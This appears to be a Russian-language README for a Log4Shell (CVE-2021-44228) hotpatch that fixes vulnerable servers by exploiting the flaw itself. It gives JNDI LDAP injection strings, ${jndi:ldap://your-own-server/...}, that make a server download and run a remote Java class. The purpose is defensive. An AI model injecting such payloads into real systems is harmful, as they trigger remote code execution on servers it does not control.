
Примените горячий патч для CVE-2021-44228, используя саму уязвимость.
Горячий патч для CVE-2021-44228, использующий саму уязвимость.
Вставьте следующий код в любое место, которое, вероятно, уязвимо к CVE-2021-44228,
${jndi:ldap://your-own-server/patch}
Чтобы предотвратить MITM-атаку во время процесса установки патча, рекомендуется следующий payload, но он менее совместим со старыми версиями Java,
${jndi:ldap://your-own-server/any_string_except_patch}
Скачайте последние релизы
Если вы хотите размещать Hotfix.class на собственном сервере, укажите системные переменные окружения LOG4J_HOTFIX_HTTP_PATH и LOG4J_HOTFIX_HTTPS_PATH
Обратите внимание: Hotfix.java следует компилировать с помощью JDK6 для максимальной совместимости.